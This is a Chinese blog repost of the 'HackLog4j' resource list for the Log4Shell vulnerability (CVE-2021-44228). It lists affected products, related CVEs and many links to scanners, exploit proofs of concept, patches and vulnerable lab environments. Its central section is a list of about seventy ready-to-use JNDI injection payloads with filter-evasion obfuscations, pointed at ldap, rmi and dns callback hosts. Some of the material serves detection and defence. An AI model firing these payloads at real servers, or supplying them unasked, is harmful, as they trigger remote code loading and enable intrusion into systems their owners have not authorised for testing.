vlambda博客
学习文章列表

【转】HackLog4j-永恒之恶龙

HackLog4j-永恒之恶龙

00-Log4j永恒恶龙[2]01-Log4j基础知识[3]02-Log4j框架识别[4]03-Log4j上层建筑[5]04-Log4j漏洞汇总[6]05-Log4j检测利用[7]06-Log4j漏洞修复[8]07-Log4j分析文章[9]08-Log4j靶场环境[10]

00-Log4j永恒恶龙

https://github.com/Goqi/ELong

01-Log4j基础知识

https://github.com/apache/logging-log4j2

02-Log4j框架识别

待更新

03-Log4j上层建筑

log4j + ? = rce !

 Apache Flink Apache Struts2 Apache Spark Apache Storm Apache Tomcat Apache Solr Apache Dubbo Apache Druid Apache OFBiz Apache Flume Redis Logstash ElasticSearch Apache Kafka Ghidra Spring-Boot-strater-log4j2 VMware vCenter Minecraft......https://fofa.so/static_pages/log4j2https://github.com/cisagov/log4j-affected-dbhttps://github.com/YfryTchsGD/Log4jAttackSurfacehttps://github.com/mubix/CVE-2021-44228-Log4Shell-Hasheshttps://github.com/CrackerCat/Log4jAttackSurfacehttps://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usageshttps://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.htmlhttps://github.com/authomize/log4j-log4shell-affectedhttps://github.com/NS-Sp4ce/Vm4J

04-Log4j漏洞汇总

CVE-2021-45105CVE-2021-44228CVE-2021-4104CVE-2019-17571CVE-2017-5645

05-Log4j检测利用

如何判断一个网站是否存在Log4j JNDI注入漏洞?如何查找内网中存在Log4j JNDI注入漏洞?

一、Payload

${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}

https://github.com/trickest/log4jhttps://github.com/test502git/log4j-fuzz-head-pochttps://github.com/woodpecker-appstore/log4j-payload-generatorhttps://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

二、源码检测

https://github.com/google/log4jscannerhttps://github.com/hupe1980/scan4log4shellhttps://github.com/logpresso/CVE-2021-44228-Scannerhttps://github.com/xsultan/log4jshieldhttps://github.com/Joefreedy/Log4j-Windows-Scannerhttps://github.com/back2root/log4shell-rexhttps://github.com/Neo23x0/log4shell-detectorhttps://github.com/dwisiswant0/look4jarhttps://github.com/Qualys/log4jscanwinhttps://github.com/lijiejie/log4j2_vul_local_scannerhttps://github.com/palantir/log4j-snifferhttps://github.com/mergebase/log4j-detectorhttps://www.t00ls.cc/thread-63931-1-1.htmlhttps://github.com/darkarnium/Log4j-CVE-Detecthttps://github.com/whitesource/log4j-detect-distributionhttps://github.com/fox-it/log4j-finderhttps://github.com/webraybtl/Log4j

三、出网检测

https://github.com/dorkerdevil/Log-4-JAMhttps://github.com/adilsoybali/Log4j-RCE-Scannerhttps://github.com/cisagov/log4j-scanner

四、不出网检测

https://github.com/For-ACGN/Log4Shellhttps://github.com/proferosec/log4jScannerhttps://github.com/Y0-kan/Log4jShell-Scanhttps://github.com/j5s/Log4j2Scanhttps://github.com/EmYiQing/JNDIScan

五、主动扫描

https://github.com/ilsubyeega/log4j2-exploitshttps://github.com/Cyronlee/log4j-rce

六、被动扫描

https://github.com/silentsignal/burp-log4shellhttps://github.com/pmiaowu/log4jScanhttps://github.com/guguyu1/log4j2_burp_scanhttps://github.com/whwlsfb/Log4j2Scanhttps://github.com/bigsizeme/Log4j-checkhttps://github.com/f0ng/log4j2burpscannerhttps://github.com/pmiaowu/log4j2Scanhttps://github.com/bit4woo/log4jScanhttps://github.com/izj007/Log4j2Scanhttps://github.com/gh0stkey/Log4j2-RCE-Scannerhttps://github.com/p1n93r/Log4j2Scanhttps://github.com/mostwantedduck/BurpLog4j2Scanhttps://github.com/j3ers3/Log4Scan

七、Header检测

https://github.com/fullhunt/log4j-scanhttps://github.com/0xInfection/LogMePwnhttps://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

八、请求参数检测

九、其他工具

https://github.com/dbgee/log4j2_rcehttps://github.com/ReadER-L/log4j-rcehttps://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concepthttps://github.com/Seayon/Log4j2RCE_Demohttps://github.com/elbosso/Log4J2CustomJMXAppenderhttps://github.com/ahus1/logging-and-tracinghttps://github.com/stuartwdouglas/log4j-jndi-agenthttps://github.com/xiajun325/apache-log4j-rce-pochttps://github.com/caoli5288/log4j2jndiinterceptorhttps://github.com/y35uishere/Log4j2-CVE-2021-44228https://github.com/ErdbeerbaerLP/log4jfixhttps://github.com/0x0021h/apache-log4j-rcehttps://github.com/Gav06/RceFixhttps://github.com/UltraVanilla/LogJackFixhttps://github.com/iamsino/log4j2-Exphttps://github.com/bkfish/Apache-Log4j-Learninghttps://github.com/LoliKingdom/NukeJndiLookupFromLog4jhttps://github.com/tangxiaofeng7/apache-log4j-pochttps://github.com/h1b1ki/apache-log4j-pochttps://github.com/EmptyIrony/Log4j2Fixerhttps://github.com/AzisabaNetwork/Log4j2Fixhttps://github.com/apple502j/Log4Jailhttps://github.com/jacobtread/L4J-Vuln-Patchhttps://github.com/stardust1900/log4j-2.15.0https://github.com/nest-x/nestx-log4jshttps://github.com/Marcelektro/Log4J-RCE-Implementationhttps://github.com/jdremillard/json-logginghttps://github.com/parayaluyanta/sell-logs-and-peacehttps://github.com/albar965/atoolshttps://github.com/Al0sc/Log4j-rcehttps://github.com/ven0n1/Log4jv2Mavenhttps://github.com/akunzai/log4j2-sendgrid-appenderhttps://github.com/inbug-team/Log4j_RCE_Toolhttps://github.com/zlepper/CVE-2021-44228-Test-Serverhttps://github.com/webraybtl/Log4jhttps://github.com/numanturle/Log4jNucleihttps://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rcehttps://github.com/kozmer/log4j-shell-pochttps://github.com/hackerhackrat/Log4j2-RCE-burp-pluginhttps://github.com/mzlogin/CVE-2021-44228-Demohttps://github.com/greymd/CVE-2021-44228https://github.com/Cybereason/Logout4Shellhttps://github.com/webraybtl/log4j-snorthttps://github.com/corretto/hotpatch-for-apache-log4j2https://github.com/alexandre-lavoie/python-log4rcehttps://github.com/hillu/local-log4j-vuln-scannerhttps://github.com/leonjza/log4jpwnhttps://github.com/cyberstruggle/L4shhttps://github.com/cckuailong/log4shell_1.xhttps://github.com/zhzyker/logmaphttps://github.com/LoRexxar/log_dependency_checklisthttps://github.com/0xDexter0us/Log4J-Scannerhttps://github.com/cckuailong/Log4j_CVE-2021-45046https://github.com/KpLi0rn/Log4j2Scanhttps://github.com/righel/log4shell_nsehttps://github.com/Ch0pin/log4JFridahttps://github.com/mycve/HTTPHeaderInjectBrowserhttps://github.com/ihebski/log4j-Scannerhttps://github.com/Yihsiwei/Log4j-exphttps://github.com/rz7d/log4j-force-upgraderhttps://github.com/xsser/log4jdemoforRCEhttps://github.com/e5g/Log-4J-Exploit-Fixhttps://github.com/Re1own/Apache-log4j-POChttps://github.com/jas502n/Log4j2-CVE-2021-44228https://github.com/ChloePrime/fix4log4jhttps://github.com/toString122/log4j2_exphttps://github.com/shanfenglan/apache_log4j_pochttps://github.com/dbgee/CVE-2021-44228https://github.com/lcosmos/apache-log4j-pochttps://github.com/dbgee/CVE-2021-44228https://github.com/lcosmos/apache-log4j-pochttps://github.com/aalex954/Log4PowerShellhttps://github.com/fox-it/log4shell-pcapshttps://github.com/Qerim-iseni09/ByeLog4Shell

06-Log4j漏洞修复

https://github.com/360-CERT/Log4ShellPatchhttps://github.com/javasec/log4j-patchhttps://github.com/simonis/Log4jPatchhttps://github.com/FrankHeijden/Log4jFixhttps://github.com/Szczurowsky/Log4j-0Day-Fixhttps://github.com/SumoLogic/sumologic-log4j2-appenderhttps://github.com/chaitin/log4j2-vaccinehttps://github.com/zhangyoufu/log4j2-without-jndihttps://github.com/CreeperHost/Log4jPatcherhttps://github.com/boundaryx/cloudrasp-log4j2https://github.com/DichuuCraft/LOG4J2-3201-fixhttps://github.com/DichuuCraft/LOG4J2-3201-fix

07-Log4j分析文章

https://lorexxar.cn/2021/12/10/log4j2-jndihttps://www.t00ls.cc/thread-63705-1-1.html

08-Log4j靶场环境

https://hub.docker.com/u/vulfocushttps://github.com/jweny/log4j-web-envhttps://github.com/fengxuangit/log4j_vulnhttps://www.t00ls.cc/thread-63695-1-1.htmlhttps://github.com/christophetd/log4shell-vulnerable-apphttps://github.com/Adikso/minecraft-log4j-honeypothttps://github.com/try777-try777/reVul-apache-log4j2-rechttps://github.com/EmYiQing/Log4j2DoShttps://github.com/tothi/log4shell-vulnerable-apphttps://github.com/Anonymous-ghost/log4jVulhttps://github.com/cyberxml/log4j-poc


Stargazers over time

[11]


引用链接

[1] 0e0w: https://github.com/0e0w
[2] 00-Log4j永恒恶龙: https://github.com/HackJava/HackLog4j2#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99
[3] 01-Log4j基础知识: https://github.com/HackJava/HackLog4j2#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86
[4] 02-Log4j框架识别: https://github.com/HackJava/HackLog4j2#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB
[5] 03-Log4j上层建筑: https://github.com/HackJava/HackLog4j2#03-log4j%E4%B8%8A%E5%B1%82%E5%BB%BA%E7%AD%91
[6] 04-Log4j漏洞汇总: https://github.com/HackJava/HackLog4j2#04-log4j%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB
[7] 05-Log4j检测利用: https://github.com/HackJava/HackLog4j2#05-log4j%E6%A3%80%E6%B5%8B%E5%88%A9%E7%94%A8
[8] 06-Log4j漏洞修复: https://github.com/HackJava/HackLog4j2#06-log4j%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D
[9] 07-Log4j分析文章: https://github.com/HackJava/HackLog4j2#07-log4j%E5%88%86%E6%9E%90%E6%96%87%E7%AB%A0
[10] 08-Log4j靶场环境: https://github.com/HackJava/HackLog4j2#08-log4j%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83
[11]

Stargazers over time

https://starchart.cc/0e0w/HackLog4j